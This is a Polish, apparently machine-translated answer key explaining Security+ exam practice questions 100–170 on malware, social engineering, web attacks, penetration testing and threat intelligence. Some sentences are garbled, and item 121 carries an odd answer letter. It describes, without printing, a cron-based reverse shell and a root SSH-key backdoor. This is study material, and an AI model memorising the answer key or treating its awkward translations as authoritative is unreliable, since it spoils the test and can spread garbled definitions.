100. B. Koń trojański udaje legalne oprogramowanie i może nawet go zawierać, ale zawiera również złośliwe oprogramowanie. Backdoory, RAT i wirusy polimorficzne są atakami, ale nie pasują do tego, co opisano w scenariuszu z pytaniem.
101. A. Trojan zdalnego dostępu (RAT) to złośliwe oprogramowanie, które umożliwia atakującemu zdalny dostęp do zaatakowanej maszyny. Wirusy makr działają wewnątrz plików pakietu Microsoft Office. Chociaż backdoor zapewni dostęp, zwykle jest to coś, co zostało w systemie umieszczone przez programistów, a nie wprowadzone przez złośliwe oprogramowanie. RAT to rodzaj konia trojańskiego, ale koń trojański jest bardziej ogólny niż to, co opisano w scenariuszu. Kiedy na egzaminie napotkasz takie pytania, będziesz musiał wybrać najlepszą odpowiedź, a nie tylko taką, która może odpowiedzieć na to pytanie!
102. B. Klonowanie kart często występuje po użyciu ataku skimmingowego do przechwytywania danych z kart, czy to z kart kredytowych, czy z kart dostępu. Ataki brute-force i oparte na tabeli tęczowej są wykorzystywane przeciwko hasłom, podczas gdy atak urodzinowy jest atakiem kryptograficznym często mającym na celu znalezienie dwóch wiadomości o tej samej wartości.
103. B. Cross-site request forgery (XSRF lub CSRF) wysyła sfałszowane żądania do witryny internetowej, rzekomo od zaufanego użytkownika. Cross-site scripting (XSS) to wstrzykiwanie skryptów do witryny internetowej w celu wykorzystania użytkowników. Przepełnienie bufora próbuje umieścić w zmiennej więcej danych niż ta zmienna może pomieścić. Trojan zdalnego dostępu (RAT) to złośliwe oprogramowanie, które umożliwia atakującemu dostęp do systemu.
104. A. Atak typu "odmowa usługi" (DoS) może mieć na celu przeciek pamięci. Jeśli atakujący może skłonić aplikację sieciową do wygenerowania przecieku pamięci, w końcu aplikacja sieciowa zużyje całą pamięć na serwerze sieciowym, a serwer sieciowy ulegnie awarii. Backdoory nie są spowodowane wyciekami pamięci. Wstrzyknięcie SQL umieszcza zniekształcony kod SQL w polach tekstowych. Przepełnienie bufora próbuje umieścić w zmiennej więcej danych, niż może pomieścić.
105. D. Jest to przykład ataku typu rozproszona odmowa usługi (DDoS) wymierzonego w aplikację do gier. Sieciowy DDoS byłby skierowany na technologię sieciową, urządzenia lub protokoły leżące u podstaw sieci. Technologia operacyjna (OT) DDoS atakuje systemy SCADA, ICS, narzędzia lub podobne systemy operacyjne. Na to pytanie wymyślono GDoS.
106. D. Fioletowe zespoły są kombinacją czerwonych i niebieskich zespołów, których celem jest wykorzystanie technik i narzędzi obu stron w celu poprawy bezpieczeństwa organizacji. Czerwony zespół to zespół, który testuje bezpieczeństwo przy użyciu narzędzi i technik, takich jak rzeczywisty napastnik. Niebieska drużyna to drużyna obrońców, która chroni przed atakującymi (a testerami jak czerwone drużyny!). Białe zespoły nadzorują konkursy cyberbezpieczeństwa i oceniają wydarzenia między czerwonymi i niebieskimi drużynami.
107. B. To jest przykład oprogramowania ransomware, które żąda zapłaty za zwrot Twoich danych. Rootkit zapewnia dostęp do uprawnień administratora/root. Bomba logiczna wykonuje swoją złośliwą aktywność, gdy zostanie spełniony pewien warunek. Ten scenariusz nie opisuje wielorybnictwa.
108. D. Jeśli dostęp nie jest prawidłowo obsługiwany, może istnieć warunek czasu sprawdzenia/czasu użycia, w którym pamięć jest sprawdzana, zmieniana, a następnie używana. Wycieki pamięci występują, gdy pamięć jest przydzielana, ale nie cofnięto alokacji. Przepełnienie bufora ma miejsce, gdy w zmiennej umieszcza się więcej danych, niż może pomieścić. Przepełnienie liczby całkowitej występuje, gdy podjęto próbę umieszczenia w zmiennej liczby całkowitej, która jest zbyt duża, na przykład podczas próby umieszczenia 64-bitowej liczby całkowitej w zmiennej 32-bitowej.
109. B. Komunikacja bliskiego pola (NFC) jest podatna na podsłuchiwanie sygnału przez atakującego. Tailgating to atak fizyczny, na który nie ma wpływu technologia NFC. Zarówno podszywanie się pod IP, jak i wyścigi nie są związane z technologią NFC.
110. B. Wirusy bezplikowe często wykorzystują PowerShell do wykonywania działań po wykorzystaniu luki w przeglądarce lub wtyczce przeglądarki do wstrzyknięcia się do pamięci systemowej. Najlepszą opcją Ricka z dostarczonej listy jest włączenie rejestrowania PowerShell, a następnie przejrzenie dzienników systemów, które jego zdaniem są zainfekowane. Ponieważ wirusy bezplikowe nie używają plików, obraz dysku prawdopodobnie nie dostarczy wielu przydatnych danych. Wyłączenie użytkownika administracyjnego nie będzie miało wpływu, ponieważ włamanie nastąpi wewnątrz konta dowolnego użytkownika, który jest zalogowany i ma wpływ na złośliwe oprogramowanie. Pliki zrzutu awaryjnego mogą zawierać artefakty wirusa bezplikowego, jeśli komputer uległ awarii, gdy był aktywny, ale jeśli tak się nie stanie, nie będą miały tych informacji.
111. B. Tailgating polega po prostu na podążaniu za uprawnionym użytkownikiem przez drzwi po ich otwarciu i jest to powszechny sposób wykorzystywania systemu dostępu opartego na karcie inteligentnej. Jest to prostsze i zwykle łatwiejsze niż próba przechwycenia i sklonowania karty. Phishing nie ma związku z bezpieczeństwem fizycznym. Chociaż możliwe jest wygenerowanie fałszywej karty inteligentnej, jest to bardzo rzadki atak. Sfałszowanie RFID jest możliwe, ale wymaga dostępu do ważnej karty RFID i również jest stosunkowo rzadkie.
112. B. Adam powinien poszukać jednego lub więcej kanałów o zagrożeniach, które pasują do rodzaju informacji, których szuka. Istnieją otwarte źródła zagrożeń, które zazwyczaj używają STIX i TAXII do kodowania i przesyłania danych z kanałów do wielu narzędzi w otwartym formacie. Żaden z pozostałych rodzajów paszy tutaj nie zaspokoiłby potrzeb Adama.
113. B. Złośliwe narzędzia, takie jak BadUSB, mogą sprawić, że kabel USB lub dysk USB będzie wyglądał jak klawiatura po podłączeniu. Nieco dziwnie, zarys egzaminu Security+ skupia się na złośliwych kablach USB, ale powinieneś mieć świadomość, że złośliwe pendrive′y to znacznie więcej powszechne i były używane przez testerów penetracji, po prostu umieszczając je na parkingu w pobliżu zamierzonego celu. Możliwy jest trojan lub robak, ale wskazówka dotycząca klawiatury wskazuje na urządzenie USB jako pierwsze miejsce, w którym powinna zajrzeć Naomi.
114. D. Użycie ataku typu pass-the-hash wymaga od atakujących zdobycia legalnego skrótu, a następnie przedstawienia go na serwerze lub usłudze. Dostarczono prawdziwy hasz; to nie było sfałszowane. Zły bliźniak to atak bezprzewodowy. Shimming to umieszczanie złośliwego kodu między aplikacją a biblioteką.
115. B. Twierdzenie, że pochodzisz z pomocy technicznej, jest twierdzeniem o autorytecie, a historia, którą podał dzwoniący, wskazuje na pilną potrzebę. Tak, ten rozmówca użył pośpiechu (rozprzestrzenił się wirus), ale nie próbował zastraszyć. Autorytet i zaufanie są ze sobą ściśle powiązane, a w tym przypadku drugim ważnym czynnikiem była pilność. Ten rozmówca użył pośpiechu, ale nie zastraszenia.
116. B. Pytania mówią nam, że są to systemy Windows 10, obecny system operacyjny. Stamtąd można bezpiecznie założyć, że coś poszło nie tak z procesem łatania lub że nie ma procesu łatania. Elaine powinna zbadać zarówno proces, jak i czy istnieją konkretne powody, dla których systemy nie zostały załatane. Ponieważ wiemy, że te systemy działają na obecnym systemie operacyjnym, można wykluczyć opcję A, nieobsługiwane systemy operacyjne. Stwierdzono, że luki to luki w systemie Windows, co wyklucza opcję C, nie ma też wzmianki o protokołach, co eliminuje również opcję D.
117. A. Zatruwanie protokołu ARP (Address Resolution Protocol), często nazywane fałszowaniem ARP, występuje, gdy atakujący wysyła złośliwe pakiety ARP do domyślnej bramy sieci lokalnej, powodując zmianę mapowania, które utrzymuje między adresami sprzętowymi (MAC) i Adresy IP. W przypadku zatruwania DNS, wpisy nazwy domeny na adres IP na serwerze DNS są zmieniane. Ten atak nie obejmował ataku na ścieżce. Backdoor zapewnia dostęp atakującemu, co omija normalne uwierzytelnianie.
118. A. W znanym teście środowiska (białej skrzynki) tester otrzymuje rozległą wiedzę na temat sieci docelowej. Pełne ujawnienie nie jest terminem używanym do opisu testowania. Testowanie w nieznanym środowisku (czarna skrzynka) polega na przekazywaniu testerowi tylko minimalnej ilości informacji. Czerwony test zespołowy symuluje określony typ napastnika, takiego jak napastnik z państwa narodowego, osoba mająca dostęp do informacji poufnych lub inny rodzaj napastnika.
119. C. Inżynieria społeczna polega na wykorzystaniu umiejętności ludzi, aby uzyskać informacje, do których inaczej nie mielibyście dostępu. Nielegalne kopiowanie oprogramowania to nie socjotechnika, ani zbieranie porzuconych podręczników i wydruków, które opisują nurkowanie na śmietnikach. E-maile phishingowe wykorzystują socjotechnikę, ale jest to jeden przykład socjotechniki, a nie definicja.
120. C. Surfowanie przez ramię polega dosłownie na zaglądaniu komuś przez ramię w miejscu publicznym i gromadzeniu informacji, na przykład haseł logowania. Zatrucie ARP zmienia tabele protokołu rozpoznawania adresów w przełączniku. Phishing to próba zebrania informacji, często za pośrednictwem poczty e-mail, lub przekonania użytkownika do kliknięcia łącza i/lub pobrania załącznika. Atak Smerfów to historyczna forma ataku typu "odmowa usługi".
121. O. Oszustwa związane z fakturami zazwyczaj wysyłają legalnie pojawiające się faktury w celu nakłonienia organizacji do zapłacenia fałszywej faktury lub skupiają się na nakłanianiu pracowników do zalogowania się na fałszywej stronie w celu uzyskania danych uwierzytelniających. Zazwyczaj nie koncentrują się na dostarczaniu złośliwego oprogramowania ani kradzieży kryptowaluty.
122. B. Skany podatności wykorzystują zautomatyzowane i półautomatyczne procesy w celu zidentyfikowania znanych podatności. Audyty zazwyczaj obejmują sprawdzenie dokumentów. Testy w nieznanym i znanym środowisku to oba rodzaje testów penetracyjnych.
123. A. Częściowo znany (szara ramka) test polega na tym, że tester otrzymuje częściowe informacje o sieci. Test znanego środowiska (białoskrzynkowego) polega na tym, że tester otrzymuje pełne lub prawie pełne informacje o sieci docelowej, a nieznane (czarnoskrzynkowe) środowiska nie dostarczają informacji o środowisku docelowym. Maskowanie nie jest terminem testowym.
124. D. W ataku na ścieżce (man-in-the-middle) atakujący znajduje się pomiędzy klientem a serwerem i po obu stronach atakujący wygląda jak pełnoprawny drugi koniec. Nie opisuje to żadnego ataku typu "odmowa usługi". Atak powtórkowy polega na ponownym przesłaniu danych logowania. Chociaż atak na ścieżce może służyć do podsłuchiwania, w tym scenariuszu najlepszą odpowiedzią jest atak na ścieżce.
125. A. W ataku typu "man-in-the-browser" złośliwe oprogramowanie przechwytuje wywołania z przeglądarki do systemu, takie jak biblioteki systemowe. Atak onpath obejmuje pewien proces między dwoma końcami komunikacji w celu złamania haseł lub kluczy kryptograficznych. W ataku na przepełnienie bufora w zmiennej umieszcza się więcej danych, niż ta zmienna miała przechowywać. Przejęcie sesji polega na przejęciu sesji uwierzytelnionej.
126. B. Przekierowanie jednolitego lokalizatora zasobów (URL) jest często używane w aplikacjach internetowych do kierowania użytkowników do innej usługi lub części witryny. Jeśli to przekierowanie nie jest odpowiednio zabezpieczone, może zostać użyte do przekierowania do dowolnej niezaufanej lub złośliwej witryny. Ten problem, znany jako luka w zabezpieczeniach Open Redirect, pozostaje dość powszechny. Pokazany kod nie zawiera kodu SQL ani LDAP i nie ma wzmianki o zmianie informacji DNS na serwerze, co powoduje, że inne opcje są nieprawidłowe.
127. D. Umieszczenie większej wartości całkowitej w mniejszej zmiennej całkowitej jest przepełnieniem liczby całkowitej. Przepełnienie pamięci nie jest terminem używanym, a przeciek pamięci dotyczy przydzielania pamięci, a nie zwalniania jej. Przepełnienia buforów często obejmują tablice. Przepełnienie zmiennej nie jest terminem używanym w branży.
128. B. Korzyść z fałszowania żądań między witrynami (XSRF lub CSRF) plików cookie i parametrów adresów URL, z których korzystają legalne witryny, aby pomóc w śledzeniu i obsłudze odwiedzających. W ataku XSRF lub CSRF atakujący wykorzystują autoryzowane, uwierzytelnione prawa użytkowników, dostarczając im plik cookie lub dane sesji, które zostaną odczytane i przetworzone podczas odwiedzania docelowej witryny. Osoba atakująca może osadzić łącze w wiadomości e-mail lub innej lokalizacji, które zostanie kliknięte lub wykonane przez użytkownika lub w zautomatyzowanym procesie z już otwartą sesją użytkownika. To nie jest wstrzykiwanie SQL, które próbowałoby wysyłać polecenia do bazy danych, ani wstrzykiwanie LDAP, które gromadzi dane z serwera katalogowego. Skrypty między witrynami (XSS) osadzałyby kod w polach danych przesyłanych przez użytkownika, które witryna internetowa będzie wyświetlać innym użytkownikom, powodując jej uruchomienie.
129. D. Do egzaminu Security+ musisz umieć czytać i rozumieć podstawowe skrypty i programy w wielu językach. W tym przykładzie możesz rozpoznać wspólną składnię Bash i zobaczyć, że dodaje ona klucz do pliku autoryzowanych kluczy dla roota. Jeśli nie jest to oczekiwany scenariusz, powinieneś się martwić!
130. D. Rootkity zapewniają dostęp administracyjny do systemów, stąd "root" w rootkicie. Koń trojański łączy złośliwe oprogramowanie z legalnym programem. Bomba logiczna wykonuje swoją złośliwą aktywność, gdy zostanie spełniony pewien warunek. Wirus wieloczęściowy infekuje sektor rozruchowy i plik.
131. C. Wycieki pamięci mogą powodować awarie i awarię. Ma to na celu aspekt dostępności CIA (poufność, integralność,i dostępności), co sprawia, że jest to kwestia bezpieczeństwa. Wycieki pamięci w rzeczywistości nie przeciekają do innych lokalizacji ani nie pozwalają na wstrzyknięcie kodu. Zamiast tego przecieki pamięci powodują wyczerpanie pamięci lub inne problemy z biegiem czasu, ponieważ pamięć nie jest prawidłowo odzyskiwana.
132. B. To pytanie łączy dwie części wiedzy: jak działa dowodzenie i kontrola botnetu oraz że domyślnym portem IRC jest TCP 6667. Chociaż może to być jedna z innych odpowiedzi, najbardziej prawdopodobną odpowiedzią, biorąc pod uwagę dostępne informacje, jest botnet, który używa Internet Relay Chat (IRC) jako swojego kanału dowodzenia i kontroli.
133. A. Aktualizacje oprogramowania routerów bezprzewodowych klasy konsumenckiej są zwykle stosowane jako aktualizacje oprogramowania układowego i Susan powinna zalecić właścicielowi firmy regularne aktualizowanie oprogramowania układowego routera bezprzewodowego. Jeśli aktualizacje nie są dostępne, może być konieczne zakupienie nowego routera, który będzie nadal otrzymywać aktualizacje i odpowiednio go konfigurować. Nie jest to domyślna konfiguracja ani niezabezpieczone konto administracyjne - ani nie jest wspomniane, ani szyfrowanie.
134. B. Identyfikacja za pomocą częstotliwości radiowych (RFID) jest powszechnie stosowana do identyfikatorów dostępu, systemów inwentaryzacji, a nawet do identyfikacji zwierząt domowych za pomocą wszczepialnych chipów. W scenariuszu testów penetracyjnych napastnicy najprawdopodobniej próbują zdobyć lub sklonować identyfikatory dostępu oparte na RFID, aby uzyskać dostęp do budynku lub pakietu biurowego.
135. B. Słowo, które musisz znać na egzaminie Security+ w zakresie phishingu przez SMS, to "smishing", termin łączący SMS i phishing. Bluejacking wysyła niechciane wiadomości do urządzeń Bluetooth, a na to pytanie wymyślono podbijanie telefonu i wielorybnictwo SMS-ów.
136. B. To jest vishing lub używanie połączeń głosowych do phishingu. Spear phishing jest wymierzony w małą, określoną grupę. Wybieranie wojenne to wybieranie numerów z nadzieją, że modem komputerowy odpowie. Robocalling służy do wykonywania niechcianych połączeń telemarketingowych.
137. A. Robaki rozprzestrzeniają się poprzez luki w zabezpieczeniach, czyniąc z tego przykład robaka. Wirus to oprogramowanie, które samoreplikuje się. Bomba logiczna wykonuje swoją złośliwą aktywność, gdy zostanie spełniony pewien warunek. Koń trojański łączy złośliwe oprogramowanie z legalnym programem.
138. B. Nurkowanie w śmietniku to proces przechodzenia przez śmieci w celu znalezienia dokumentów. Niszczenie dokumentów pomoże zapobiec nurkowaniu w śmietnikach, ale prawdziwie oddani nurkowie w śmietnikach mogą ponownie złożyć nawet dobrze zniszczone dokumenty, co prowadzi do tego, że niektóre organizacje spalają swoje najbardziej wrażliwe dokumenty po ich zniszczeniu. Phishing często odbywa się za pośrednictwem poczty elektronicznej lub telefonu i jest próbą wyłudzenia informacji lub przekonania użytkownika do kliknięcia łącza lub otwarcia załącznika. Surfowanie przez ramię to dosłownie zaglądanie komuś przez ramię. W ataku on-path (man-in-themiddle) atakujący znajduje się między klientem a serwerem, a po obu stronach atakujący wygląda jak uprawniony drugi koniec.
139. B. Systemy nie powinny mieć zainstalowanego rootkita, gdy rozpoczyna się test penetracyjny, a rootkity zainstalowane podczas testu powinny zostać całkowicie usunięte i bezpiecznie usunięte. Pozostałe opcje to typowe części procesu czyszczenia testów penetracyjnych. Możesz przeczytać więcej na standardowej stronie testów penetracyjnych pod adresem www.pentest-standard.org/index.php/Post_Exploitation.
140. C. Jest to przykład internetowego ataku słownikowego typu brute-force. Ataki słownikowe wykorzystują popularne hasła, a także typowe zamienniki, aby próbować włamać się do systemu lub usługi. Algorytmy wycofywania, które blokują atakujących po niewielkiej liczbie niepoprawnych prób podania hasła, mogą pomóc spowolnić lub zatrzymać ataki słownikowe i inne ataki typu brute-force na hasła. Tabele tęczowe to tabele wstępnie obliczonych skrótów. Atak urodzinowy to metoda generowania kolizji hashów. Wreszcie, w tym scenariuszu nie jest wskazane żadne podszywanie się.
141. C. Jim odkrył skimmer, urządzenie wykorzystywane do ataków typu skimming, które przechwytują informacje o kartach kredytowych i debetowych. Skimmery mogą być w stanie bezprzewodowo przesyłać przechwycone informacje lub mogą wymagać od atakujących pobrania danych osobiście. Niektóre skimmery zawierają kamery do przechwytywania naciśnięć klawiszy dla kodów PIN i innych danych. Atak polegający na powtórzeniu może ponownie wykorzystać dane uwierzytelniające lub inne informacje, aby zachowywać się jak legalny użytkownik, sytuacja wyścigu ma miejsce, gdy można wykorzystać czas użycia i czas sprawdzenia danych, a klonowanie kart zostanie użyte po przeskanowaniu kart powielać je.
142. D. Aktywny rekonesans łączy się z siecią przy użyciu technik takich jak skanowanie portów. Rozpoznanie czynne i bierne można przeprowadzić ręcznie lub za pomocą narzędzi. Czarna skrzynka i biała skrzynka odnoszą się do ilości informacji, jakie otrzymuje tester. Atakujący i testerzy stosują oba rodzaje rozpoznania.
143. D. Paski narzędzi przeglądarki są czasami przykładami PUP lub potencjalnie niechcianych programów, takich jak spyware lub adware. Robak to rodzaj złośliwego oprogramowania, które rozprzestrzenia się samoczynnie, wykorzystując luki w zabezpieczeniach systemów podłączonych do sieci. Gdy zainfekuje system, zwykle skanuje w poszukiwaniu innych podatnych systemów i nadal się rozprzestrzenia. RAT to trojan zdalnego dostępu, a rootkit służy do uzyskiwania i utrzymywania dostępu administracyjnego.
144. B. OSINT lub wywiad o otwartym kodzie źródłowym to informacje wywiadowcze uzyskane ze źródeł publicznych, takich jak wyszukiwarki, strony internetowe, rejestratory nazw domen i wiele innych lokalizacji. OPSEC, czyli bezpieczeństwo operacyjne, odnosi się do nawyków, takich jak nieujawnianie zbędnych informacji. STIX to protokół Structured Threat Intelligence Exchange, a IntCon został wymyślony na to pytanie.
145. C. Wodopój atakuje grupy docelowe, koncentrując się na wspólnych zachowaniach, takich jak odwiedzanie określonych stron internetowych. Jeśli atakujący mogą złamać witrynę lub przeprowadzić za jej pośrednictwem ukierunkowane ataki, mogą następnie zaatakować tę grupę. Na to pytanie zostały wymyślone ataki typu watercooler, sieci phishingowe i phish pond.
146. C. Chociaż zapytania w języku SQL (Structured Query Language) są często sparametryzowane, praktyki bezpieczeństwa protokołu LDAP (Lightweight Directory Access Protocol) koncentrują się zamiast tego na walidacji danych wejściowych użytkownika i filtrowaniu danych wyjściowych, aby zapewnić, że w zapytaniach nie zostanie zwrócona nadmierna ilość danych. Podobnie jak w przypadku wszystkich usług, bezpieczna konfiguracja usług LDAP jest jednym z pierwszych zabezpieczeń, które należy wprowadzić.
147. B. Chociaż może to zabrzmieć dramatycznie, strony dostępne przez Tora lub inne narzędzia, które oddzielają je od reszty Internetu, są czasami nazywane "ciemną siecią". Na egzaminie Security+ używa się tego terminu, więc musisz go znać podczas egzaminu. Pozostałe opcje zostały wymyślone i mogą być prawie tak głupie, jak nazwanie części Internetu ciemną siecią.
148. B. Przekierowanie adresów URL ma wiele uzasadnionych zastosowań, od przekierowywania ruchu z nieobsługiwanych już linków do bieżących zamienników, po skracanie adresów URL, ale przekierowywanie adresów URL było powszechnie wykorzystywane do ataków phishingowych. Nowoczesne przeglądarki wyświetlają pełny, prawdziwy adres URL, pomagając ograniczyć wpływ tego typu ataku. Śledzenie wygaśnięcia certyfikatu służy do upewnienia się, że certyfikaty witryny są aktualne, ale nie zapobiega atakom polegającym na przekierowywaniu adresów URL. Włączenie obsługi JavaScript lub wyłączenie plików cookie również nie jest pomocne w tym celu.
149. A. Luki w usługach w chmurze wymagają pracy ze strony dostawcy usług w chmurze w celu ich usunięcia. Większość luk we własnej infrastrukturze możesz usunąć samodzielnie, bez udziału osób trzecich. Luki w usługach w chmurze i lokalnej infrastrukturze mogą być równie poważne, a ich naprawienie może zająć tyle samo czasu. Niezależnie od tego, gdzie Twoja organizacja przechowuje swoje dane, Twoja odpowiedzialność za nie jest prawdopodobnie taka sama!
150. C. Konsumenckie routery bezprzewodowe zapewniają lokalny dostęp administracyjny za pomocą swoich domyślnych poświadczeń. Chociaż zalecają zmianę hasła (a czasami nazwy użytkownika dla większego bezpieczeństwa), wiele instalacji skutkuje niezabezpieczonym kontem administracyjnym. Pozostałe odpowiedzi to wszystkie typowe problemy, ale nie te, które opisano w pytaniu.
151. A. Zespół czerwony to zespół, który testuje bezpieczeństwo przy użyciu narzędzi i technik, takich jak rzeczywisty napastnik. Niebieska drużyna to drużyna obrońców, która chroni przed atakującymi (a testerami jak czerwone drużyny!). Fioletowe zespoły są kombinacją czerwonych i niebieskich zespołów, których celem jest wykorzystanie technik i narzędzi obu stron w celu poprawy bezpieczeństwa organizacji. Białe zespoły nadzorują konkursy cyberbezpieczeństwa i oceniają wydarzenia między czerwonymi i niebieskimi drużynami.
153. A. Usługi orkiestracji zabezpieczeń, automatyzacji i reagowania (SOAR) są zaprojektowane do integracji z szerszym zakresem aplikacji zarówno wewnętrznych, jak i zewnętrznych. Zarówno systemy zarządzania informacjami o zabezpieczeniach i zdarzeniami (SIEM), jak i SOAR zazwyczaj zawierają narzędzia do zarządzania zagrożeniami i podatnościami, a także funkcje automatyzacji operacji bezpieczeństwa.
154. A. Test znanego środowiska (białej skrzynki) obejmuje dostarczenie obszernych informacji, jak opisano w tym scenariuszu. Znany test środowiskowy może być testem wewnętrznym lub zewnętrznym. Ten scenariusz opisuje przeciwieństwo testu nieznanego środowiska (czarnej skrzynki), który wymagałby zerowej wiedzy. Test zagrożeń nie jest terminem używanym w testach penetracyjnych.
155. C. Zarówno plik Windows Security Account Manager (SAM) jak i plik /etc/shadow dla systemów Linux zawierają hasła i są popularnymi celami ataków typu brute-force w trybie offline.
156. C. Atak SSL stripping wymaga od atakującego przekonania ofiary do przesłania przez nią ruchu za pośrednictwem protokołu HTTP, przy jednoczesnym dalszym wysyłaniu zaszyfrowanego ruchu HTTPS do legalnego serwera, udając ofiarę. Nie jest to atak typu brute-force, atak trojana wymagałby złośliwego oprogramowania, a atak typu downgrade próbowałby przenieść zaszyfrowaną sesję do mniej bezpiecznego protokołu szyfrowania.
157. C. Program U.S. Trusted Foundry ma na celu zapobieganie atakom w łańcuchu dostaw poprzez zapewnienie pełnego bezpieczeństwa łańcucha dostaw dla ważnych układów scalonych i elektroniki.
158. B. Mapy zagrożeń, takie jak te, które można znaleźć na stronach threatmap.fortiguard.com i threatmap.checkpoint.com, to wizualizacje danych w czasie rzeczywistym lub w czasie zbliżonym do rzeczywistego gromadzone przez dostawców i inne organizacje które mogą pomóc w wizualizacji głównych zagrożeń i pomóc w ich analizie. Wykresy kołowe mogą być wykonywane w czasie rzeczywistym za pośrednictwem informacji o zabezpieczeniach i zarządzania zdarzeniami (SIEM) lub innych systemów, ale należy pamiętać, że nie wspomniano o żadnym SIEM ani innym urządzeniu. Na to pytanie wymyślono ciemny tracker, a repozytoria OSINT nie wyświetlałyby takich danych w czasie rzeczywistym.
159. B. Bluesnarfing obejmuje dostęp do danych z urządzenia Bluetooth, gdy jest ono w zasięgu. Bluejacking polega na wysyłaniu niezamówionych wiadomości do urządzeń Bluetooth, gdy są w zasięgu. Ataki złych bliźniaków wykorzystują nieuczciwy punkt dostępowy, którego nazwa jest podobna lub identyczna z nazwą legalnego punktu dostępowego. RAT to trojan dostępu zdalnego i nic w tym scenariuszu nie wskazuje na to, że przyczyną kradzieży danych jest RAT.
160. B. Zasady zaangażowania w test penetracyjny zazwyczaj obejmują rodzaj i zakres testów, dane kontaktowe klienta i wymagania dotyczące tego, kiedy zespół powinien zostać powiadomiony, wymagania dotyczące przetwarzania danych wrażliwych oraz szczegóły regularnych spotkań i raportów dotyczących statusu.
161. C. To polecenie uruchamia odwrotną powłokę łączącą się z example.com na porcie 8989 co godzinę. Jeśli nie znasz crona , powinieneś poświęcić chwilę na zapoznanie się z podstawami poleceń crona i tym, co możesz z nimi zrobić - możesz przeczytać stronę podręcznika dla crona pod adresem manpages.ubuntu.com/manpages/focalman8/cron. 8.html.
162. C. Tester penetracyjny wykorzystał zasadę pilności, a także wykorzystał pewne elementy autorytetu, twierdząc, że jest starszym członkiem organizacji. Nie grozili ani nie zastraszali pracownika działu pomocy i nie sprawiali, że coś wydawało się rzadkie, ani nie próbowali budować zaufania u członka personelu.
163. A. Zastrzeżone lub zamknięte informacje o zagrożeniach to informacje o zagrożeniach, które nie są publicznie dostępne. OSINT, czyli inteligencja zagrożeń typu open source, jest dostępna bezpłatnie. ELINT to wojskowe określenie wywiadu elektronicznego i sygnałowego. W odpowiedzi na to pytanie wymyślono korporacyjny wywiad o zagrożeniach.
164. B. CompTIA definiuje "manewr" w kontekście polowania na zagrożenia jako sposób myślenia jak złośliwy użytkownik, aby pomóc Ci zidentyfikować potencjalne wskaźniki kompromisu w Twoim środowisku. Poza egzaminem Security+ nie jest to powszechnie używany termin w normalnej praktyce bezpieczeństwa, chociaż pojawia się w zastosowaniach wojskowych. Ponieważ termin ten nie jest powszechny poza egzaminem Security+, upewnij się, że rozumiesz definicję CompTIA. Fuzja danych wywiadowczych łączy wiele źródeł danych wywiadowczych, źródła informacji o zagrożeniach służą do dostarczania informacji o zagrożeniach, a porady i biuletyny są często łączone z źródłami danych o zagrożeniach w celu zrozumienia nowych ataków, luk w zabezpieczeniach i innych informacji o zagrożeniach.
165. B. Dzieciaki skryptowe są najmniej zasobnymi z najczęstszych cyberprzestępców wymienionych powyżej. Ogólnie rzecz biorąc, przepływają one od krajowych aktorów państwowych jako najbardziej zamożnych, przez zorganizowaną przestępczość, do haktywistów, do aktorów wewnętrznych, a następnie do tworzenia scenariuszy dla dzieciaków jako najmniej zdolnych i najmniej wyposażonych aktorów. Podobnie jak w przypadku każdej takiej skali, istnieje miejsce na pewną zmienność między konkretnymi aktorami, ale na egzaminie należy je śledzić w tej kolejności.
166. B. Powódź SYN jest rodzajem ataku polegającego na wyczerpaniu zasobów i wykorzystuje wszystkie dostępne sesje w systemie, do którego jest skierowany. Chociaż powódź SYN może być atakiem DDoS, nie wspomniano o wielu maszynach źródłowych do ataku. Nie wspomniano o żadnej aplikacji, a powódź SYN dotyczy stosu TCP/IP w systemie, a nie aplikacji. Nie wspomniano o żadnej podatności i żadna nie jest wymagana do SYN flood, ponieważ po prostu próbuje przytłoczyć zdolność celu do obsługi otwartych połączeń. Ochrona przed powodziami SYN koncentruje się na zapobieganiu wyczerpywaniu zasobów przez otwarte połączenia oraz identyfikowaniu i blokowaniu hostów, które dopuszczają się nadużyć.
167. A. Preteksty to rodzaj inżynierii społecznej, która polega na wykorzystaniu fałszywego motywu i kłamstwie w celu uzyskania informacji. W tym przypadku tester penetracyjny skłamał o swojej roli i dlaczego dzwonią (podszywanie się), a następnie zbudował zaufanie do użytkownika, zanim poprosił o dane osobowe. Atak wodopoju wykorzystuje witrynę internetową, z której korzystają wszyscy zaatakowani użytkownicy, i umieszcza na niej złośliwe oprogramowanie, aby osiągnąć swój cel. Przewijanie jest określane przez CompTIA jako "dodawanie wyrażenia lub frazy", a przeglądanie na ramieniu polega na oglądaniu osoby przez ramię lub obserwowaniu, jak wprowadza ona poufne informacje, takie jak hasła.
168. C. Możesz być zaznajomiony z terminem prowadzenie wojny, ale latanie bojowe jest coraz bardziej powszechne, ponieważ drony weszły do powszechnego użytku. Chociaż mało prawdopodobne jest, aby testerzy penetracji przelecieli helikopterem lub samolotem nad miejscem docelowym, niedrogie drony mogą zapewnić przydatny wgląd zarówno w bezpieczeństwo fizyczne, jak i zasięg sieci bezprzewodowej, jeśli są wyposażone w odpowiedni sprzęt. Na to pytanie wymyślono dronowanie i podsłuch z powietrza, a Air Snarf to stare narzędzie do przechwytywania nazw użytkowników i haseł w wrażliwych sieciach bezprzewodowych.
169. C. Wiele organizacji posiada starsze platformy, których nie można łatać ani aktualizować, ale które nadal stanowią ważną część ich działalności. Specjaliści ds. bezpieczeństwa są często proszeni o zasugerowanie sposobów zabezpieczenia systemów przy jednoczesnym pozostawieniu ich do działania. Typowe opcje obejmują przeniesienie urządzeń do izolowanej wirtualnej sieci LAN (VLAN), odłączenie urządzeń od sieci i zapewnienie, że nie zostaną ponownie podłączone oraz użycie zapory lub innego urządzenia zabezpieczającego w celu zapewnienia, że starszy system jest chroniony przed atakami i nie może przeglądać Internet lub wykonywać inne czynności, które mogą spowodować zagrożenie.
170. B. Według krajowej rady ISAC, ośrodków wymiany informacji i analizy, "Informacje udostępniane i analizowane" Centra (ISAC) pomagają właścicielom i operatorom infrastruktury krytycznej chronić ich obiekty, personel i klientów przed zagrożeniami cybernetycznymi i fizycznymi oraz innymi zagrożeniami. ISAC zbierają, analizują i rozpowszechniają wśród swoich członków informacje o zagrożeniach, które można podjąć, a także zapewniają członkom narzędzia do ograniczania ryzyka i zwiększania odporności. IRT to zespoły reagowania na incydenty, Feedburner to narzędzie Google do zarządzania kanałami RSS, a kanały o zagrożeniach pionowych nie są terminem branżowym.
